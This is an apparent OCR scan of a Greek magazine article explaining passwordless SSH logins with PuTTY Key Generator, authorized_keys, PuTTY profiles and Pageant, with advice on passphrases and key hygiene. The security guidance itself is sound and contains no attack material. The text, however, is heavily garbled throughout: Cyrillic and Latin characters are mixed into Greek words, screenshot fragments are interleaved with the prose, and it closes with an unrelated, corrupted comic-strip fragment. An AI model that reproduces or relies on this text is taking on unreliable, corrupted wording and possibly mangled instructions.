ένας χαρακτήρας. Προαιρετικά, 
στο πεδίο Key comment (2) 
μπορούμε γα πληκτρολογήσουµε 
ένα χαρακτηριστικὀ όνομα για 
Το Κλειδί — кат! που θα Το Κάνει 
va ξεχωρίζει ἄμεσα µέσα στο 
authorized_keys. Αν και δεν είναι 
υποχρεωτικό, то ιδιωτικό κλειδί 
μπορούμε να то προστατεύσουμε 
pe ένα passphrase (3). Σε 
αντίθεση ue ra passwords, ra 
passphrases επιτρέπεται να 
περιλαμβάνουν *kat* κενά. Αν 
δεν παραγάγουµε, ένα μακρύ και 
πραγματικά τυχαίο passphrase, 
TLX., µε Τη βοήθεια του LastPass, 
µια καλή ιδέα είναι va εισάγουµε 
μια αγαπημένη μας φράση που 
πάντα θυμόμαστε αλλά κανείς 
άλλος δεν µπορεί va μαντέψει. 
Πριν εγκαταλείψουµε ro PuTTY 
Κεγ Generator θα αποθηκεύσουµε 
κάπου το δημόσιο (4) καθώς και 
το ιδιωτικό (5) κλειδί. 


Ανά πάσα στιγµή μπορούμε 

va φορτώσουμµε ένα ιδιωτικό 
κλειδί στο ΡΙΤΤΥ Key Generator, 
kat στο πλαίσιο πάνω πάνω θα 
εμφανίζεται *kat* το δημόσιο 
κλειδί. Ένας τρόπος για να Το 
μεταφέρουμε στο authorized _ 
keys ενός αποµακρυσµένου 


3 || host, είναι ue απλό copy/paste. 
|| Συνδεόµαστε, δηλαδή, µε τη 


βοήθεια rou PuTTY στον host, 
ανοίγουµε ro —/.ssh/authorized . 
keys (π.χ., µε ro nano) Και στο 
τέλος του αρχείου επικολλάµε ro 
δημόσιο κλειδί. 
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Στις ρυθµίσεις του προφίλ 
(του PuTTY) για τον host 
στον οποίο θέλουμε va 
συνδεόµαστε χωρίς 
password, φροντίζουμε να 
δώσουμε το username του 
αντίστοιχου λογαριασμού 
(Connection > Data και 
συμπλήρωση του πεδίου 
Auto-login username). 


Επίσης, στο προφίλ του 
λογαριασμού φροντίζουμε 
να υποδείξουµε το 

ιδιωτικό κλειδί που θα 
χρησιμοποιείται για τη 
"δοκιμασία" που θα στέλνει ο 
απομακρυσμένος host. 


BB 


Options controlling SSH authentication 


[E] Bypass authentication entirely (SSH-2 only) 

[V] Display pre-authentication banner (SSH-2 only) 
Authentication methods 

Attempt TIS or CryptoCard auth (SSH-1) 

[V] Attempt "keyboard-nteractive" auth (SSH-2) 
Authentication parameters 

[Г] Allow agent forwarding 

[Г | Allow attempted changes of usemame іп SSH-2 
Private key file for authentication: 
CAUsersNohndoeNDocuments win 7vm.s 


Ασφαλή απομακρυσμένα logins, χωρίς password 


2015 from 10.10.10.173 


Prompt for passphrase :/ 


Αφού κάνουμε τις απαραίτητες αλλαγές στο προφίλ σύνδεσης rou PuTTY, επιχειρούµε να αποκτήσουμε πρόσβαση στον 
απομακρυσμένο λογαριασμό. Χωρίς ιδιαίτερη έκπληξη, βλέπουμε ότι µας ζητείται Το passphrase του ιδιωτικού κλειδιού. 
Το πληκτρολογούµε και η σύνδεση επιτυγχάνει. Αλλά για шоб λεπτό: Αν είναι να πληκτρολογούµε passphrase αντί για 
password, ποιο το κέρδος; Είμαστε σίγουροι ότι µπορείτε να δώσετε μόνοι σας µια καλή απάντηση. Ὅπως και να то 
κάνουμε, όµως, η πληκτρολόγηση passphrase δεν είναι ό,τι πιο διασκεδαστικό. Ευτυχώς, έχουµε τη δυνατότητα να то 
δίνουμε μόνο µία φορά κι όσο παραμένουµε συνδεδεμένοι στο τοπικό account των Windows να µην το δίνουμε ξανά, όσες 
φορές κι αν χρειαστεί να χρησιµοποιηθεί το ιδιωτικό κλειδί. Για να γίνει όµως κάτι τέτοιο χρειάζεται να τρέχει το λεγόμενο 
Pageant του PuTTY (βρείτε то στο μενού µε τα προγράμματα και συγκεκριμένα εντός του φακέλου του РИТТҮ). 


New Session 


Saved Sessions » IcePi 


View Keys 
Add Key 


Help 
About 


Exit 


Αφού ενεργοποιήσουµε ro Pageant, το πρόγραµµα θα κάνει διακριτικά αισθητή την παρουσία του µε ένα μικρό εικονίδιο στο system 
tray των Windows. H πρώτη δουλειά που "οφείλουμε” να κάνουμε είναι να του δώσουμε το ιδιωτικό µας κλειδί (κλικ ото Add 

Key). Βεβαίως, yia να φορτωθεί το κλειδί θα χρειαστεί va πληκτρολογήσουµε ro passphrase του. Στο εξής -kat όσο ro Pageant 
λειτουργεί-- δεν θα δώσουμε ξανά To passphrase. Па va συνδεθούµε passwordless σε ένα απομακρυσμένο host στο οποίο βρίσκεται 
το δημόσιο κλειδί µας, από το μενού Saved Sessions rou Pageant αρκεί va υποδείξουµε το αντίστοιχο προφίλ του PuTTY. 
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Επιτυχία! Μόλις συνδεθήκαµε στο απομακρυσμένο host µέσω SSH, µε τη βοήθεια του PuTTY και χωρίς να 
πληκτρολογήσουµε password ή passphrase. 


Ασφάλεια και ευκολία, αλλά µε αντάλλαγμα 


Χάρη στις τεχνικές της κρυπτογραφίας δημοσίου κλειδιού, µε το SSH είναι δυνατό 
να ἔχουμε υψηλό επίπεδο ασφάλειας (ισχυρά κρυπτογραφημένες συνδέσεις) και 
την ἴδια στιγµή µεγάλη ευκολία (passwordless logins). Υπάρχει όµως κι éva τίμημα: 
Αν θέλουμε να χαρακτηριζόµαστε ως καλοί διαχειριστές και πράγματι να εἰμαστε, 
οφείλουμε va κρατάμε ενημερωμένα τα αρχεία authorized. keys στα διάφορα µηχα- 
νήματα ή/και (cloud) servers που συντηρούμε. Τα εν λόγω αρχεία καλό εἰναι va TE- 
ριλαμβάνουν μόνο το ελάχιστο πλήθος δημοσίων κλειδιών, τα οποία προέρχονται 
апо εν ενεργεία clients που εἶναι απαραίτητο να συνδέονται στον εκάστοτε remote 
host. Βεβαίως, σε περίπτωση που χάνουμε τον έλεγχο ενός ιδιωτικού κλειδιού, 
τότε αμέσως πρέπει να εξαφανίζουμε κάθε παρουσία του αντίστοιχου δημοσίου 
κλειδιού. 


Πα την προστασία του (ёоо του ιδιωτικού κλειδιού, αν δεν έχουµε ορίσει κάποιο 
passphrase τότε ας φροντίσουμε WOTE στο λογαριασμό χρήστη όπου βρίσκεται 
αποθηκευμένο να έχουµε μόνον εμείς πρόσβαση. Επιπρόσθετα, η κρυπτογράφηση 
του συστήµατος αρχείων δεν εἶναι καθόλου κακή ιδέα -- ειδικά αν μιλάμε για laptop. 


Αν πάλι έχουµε ασφαλίσει το ιδιωτικό κλειδί µε passphrase, τότε και να πέσει σε 
ξένα χέρια δεν υπάρχει σοβαρός λόγος για ανησυχία — αρκεί βέβαια το passphrase 
να εἰναι ισχυρό. Το καλύτερο passphrase είναι éva εντελώς τυχαίο string µε µεγάλο 
μήκος, π.χ., τουλάχιστον 25 χαρακτήρες, που συνδυάζει πεζά και κεφαλαία, αριθ- 
μούς και ειδικούς χαρακτήρες. Πα την παραγωγή ενός πραγματικά τυχαίου καιισχυ- 
роо passphrase, δεν εἶναι κακή ιδέανα καταφεύγουμε σε κάποιον password manager 
όπως, π.χ. εἰναι το πανταχού παρόν LastPass. Μεταξύ ἄλλων, το LastPass επιτρέπει 
τη δηµιουργία ασφαλών σημειώσεων, οπότε μπορούμε να έχουµε μία σημείωση µε 
ΤΟ passphrase ñ ra passphrases που πρέπει να δίνουμε αλλά αδυνατούμε να θυμό- 
μαστε. 


Σας αφήνουμε να βελτιώσετε την ασφάλεια της υποδομής σας στο σπίτι, στο χώρο 
εργασίας ή/και στο cloud. Καλή σας διασκέδαση. 
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D POTETE 57 
AEN ACO AMEME 
X АМА «АМӨРОПО?>, 
›) παπι ENKENTPO 
τας КАМСТОМ\А, 
EINA TO ATOMO! 


ЕХО. 
DEAC VA NA 
В^ЕПО ΤΗΝ 
ОРА... 
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